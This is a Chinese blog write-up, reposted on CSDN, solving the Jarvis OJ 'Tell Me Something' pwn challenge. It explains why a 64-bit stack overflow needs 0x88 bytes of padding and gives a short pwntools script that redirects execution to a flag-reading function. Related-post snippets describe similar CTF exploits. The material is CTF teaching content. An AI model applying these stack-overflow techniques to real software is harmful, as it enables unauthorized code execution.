Jarvis Oj Pwn 学习笔记-Tell Me Something

最新推荐文章于 2024-10-16 21:46:58 发布

baoan4763

最新推荐文章于 2024-10-16 21:46:58 发布

阅读量114

点赞数

文章标签： shell

原文链接：http://www.cnblogs.com/Magpie/p/9119021.html

版权

记一个64位栈帧的坑！！！

老板儿，链接要得：

https://files.cnblogs.com/files/Magpie/guestbook.rar

nc pwn.jarvisoj.com 9876

第n次checksec...:

宣IDA觐见：

good_name一看就很妖孽，于是跟进去：

好嘛~搞定了这不！

看一下main函数的溢出点：

于是payload：

junk='A' * (0x88 + 0x08)

ret=p64(0x400620)

payload=junk + ret

写好后一个payload打过去。。。结果，，说好的shell呢！！！ /(ㄒoㄒ)/~~

所以，有坑！

现在我们来看一下汇编：

main：

good_name:

仔细一看，惊了！

main：----->

good_name： & ----->

所以，，它的栈帧处理和平衡的方式和我们常见的那种形式（push ebp , mov ebp,esp , sub esp,size_of_frame）是不一样的！

因此，它的栈帧结构里实际上是没有old_ebp的，即junk的size为0x88而非0x88+8

这样一来问题就解决了，我们上exp：

 1 from pwn import*
 2 r=remote('pwn.jarvisoj.com','9876')
 3 print r.recvline()
 4 pad='a'*0x88
 5 add=p64(0x400620)
 6 payload=pad+add
 7 r.sendline(payload)
 8 print payload
 9 print r.recvline()
10 print r.recvline()

从这道题中我们得到一个教训：

看汇编！

看汇编！！

一定要看汇编！！！

转载于:https://www.cnblogs.com/Magpie/p/9119021.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

baoan4763

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Jarvis oj tell me something writeup

ditto的博客

12-31

268

拿到题目前checksec下： 64位，开启了NX。放到IDA里看下：就单纯的栈溢出，看下调用哪些函数： plt表里并没有system函数，也不知道对方使用的动态库的版本。看到函数good_game: 这个函数会读取flag，那么就很显然了，将返回地址覆盖到这个函数即可。计算下溢出点：由于是64位的程序，不能访问大于0x00007fffffffffff的地址空间。但是可以通...

jarvisoj——Tell Me Something

王嘟嘟的博客

07-14

579

本来想做其他的平台，但是搜了一下还是这个平台比较适合入门。题目 Wp 这里首先下载，然后ida打开，看到main函数 main函数说的实际上就是有一个保存的栈大小为136，但是确允许输入256栈大小的内容，这里存在栈溢出的问题。然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。那么需要做的就是先覆盖，这里我自己感觉的是，覆盖先将自身拉满，然后加返回地址直接覆盖就行。最后就是先覆盖136的自身，然后加上good_game的地址即可。 pwntools fro

参与评论您还未登录，请先登录后发表或查看评论

jarvisoj_tell_me_something

m0sway的博客

11-23

456

jarvisoj_tell_me_something 使用checksec查看：看来又是一道栈溢出的题目，直接放IDA查看：一眼看过去,main()函数中就已经存在栈溢出了查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可需要注意的是: 函数起始的时候并没有将rbp压入栈中,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from

Jarvis OJ Tell Me Something

九层台

04-05

595

nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料： python zio模块。拿到程序名字太长了，改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...

BUUCTF：jarvisoj_tell_me_something（write up）

qq_44768749的博客

08-24

542

BUUCTF：jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析仅开启了栈不可执行保护 0x02 运行只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路是一道简单的栈溢出题，知道覆盖长度即可，gdb调试发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python

18.9.19 Jarvis OJ PWN----Smashes

qq_42192672的博客

09-19

554

先checksec一下我的天，有栈保护，nx，咋办…… IDA进去，我们可以看见有个函数挺关键的，如下我们可以看到stdin是可以无限输入的，但是只有接收输入时接收到'\n'，才会继续执行（跳出while循环），找不出栈溢出的办法然后看了大佬的操作之后发现：可以故意触发canary来攻击(SSP（Stack Smashing Protector ） leak) 先介绍一下好...

18.9.19 Jarvis OJ PWN----[XMAN]level3

qq_42192672的博客

09-19

389

打开压缩包，看到了两个文件，surprise! 有个lib文件 checksec一波，发现没有保护栈那就先找到可以栈溢出的地方哟，如下可是问题来了，没有system函数，也没有/bin/sh字符串，但是在链接库（lib文件）中可以找到，如下我们显然必须要知道system函数与/bin/sh字符在内存中的地址，之前我也不知道该怎么找，开始向大佬学姿势 key_point:...

pwn学习-jarvisoj-level4-无libc的漏洞利用

qq_45653588的博客

12-20

285

这题下载文件下来，文件与level3反编译后伪代码基本一样，只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出，分配了0x88的空间，能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32

【jarvisoj刷题之旅】pwn题目Tell Me Something的writeup

iqiqiya的博客

10-14

1014

题目信息： file一下发现是64位的ELF checksec检查下安全性 objdump -t 文件名可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...

Jarvis OJ-PWN

weixin_45461609的博客

08-08

266

pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系，真·一点关系也没有。提供了system()函数并且在mem_test函数中的输出hint的地址，hint地址内容为cat flag。所以只需要将返回地址改成system()所在的地址，并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a

JarvisOJ Web&Reverse&Pwn

热门推荐

4ct10n

11-16

5万+

Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK

Jarvis OJ-PWN-Tell Me Something wp

分不清东西南北的Laffey

11-02

416

开启了NX保护说明栈中数据没有执行权限拖到IDA里看一下通过观察IDA左侧的函数栏可以看到一个good_game函数点进去观察我们看到了flag.txt 可以想到flag应该就在这个txt文档里于是我们就可以让溢出的返回地址为good_game函数通过cyclic或者IDA来获取长度 from pwn import * #p=process("./guestbook") ...

(Jarvis Oj)(Pwn) Tell Me Something

Nothing

06-14

1030

(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。丢到ida中，主函数。然后发现了good_game函数。这个函数的用途就显而易见了，输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出，将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...

Jarvis OJ PWN题解持续更新~

qq_41071646的博客

03-28

1108

最近沉（被）迷（迫）学pwn 看我们的志琦大佬我就知道 pwn 玩玩就行但是不认真学不行然后向大佬打听了几个pwn的平台网站打算玩一下这里找到了Jarvis OJ 然后我是看那个做出来的人多我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题其实很简单栈溢出没有任何防护就防护了 ...

Shell脚本更新CMakelists.txt, 注释/反注释 #ros2相关的内容

coco的专栏

10-12

719

Qt Creator ROS2没有提供官方集成（2024-10-12），用github开源插件 ros_qtc_plugin（参见我的另外一篇博文）,。由于Qt版本变化，插件突然失效，Qt无法打开我的ROS2工程。没时间调研，暂时采取注释掉CMakelists文件中ROS2相关内容，Qt Creator仅用来编辑Qt UI页面，命令行编译方式workaround。Shell 脚本功能：修改CMakelists.txt，注释/取消注释和#ros2 end之间的内容（不包括这两行，以及其他注释）

HWS赛题入门 MIPS Pwn-HWS_pwn(IDA插件mipsrop)

一个啥也不会的小菜鸡！

10-10

479

libc版本：HWS赛题入门 MIPS Pwn | Clang裁缝店 (xuanxuanblingbling.github.io)这里的看似是堆溢出其实是栈溢出一处之后直接转为栈溢出劫持返回地址,由于MIPS的栈存在可执行权限所以直接使用shellcode写入栈中,并且使用gadgets跳转执行栈上的shellcode!

【CICD运维】GitLab + Shell + Minio实现应用程序自动打包，自动生成版本号，并且上传到Minio对象存储系统归档保存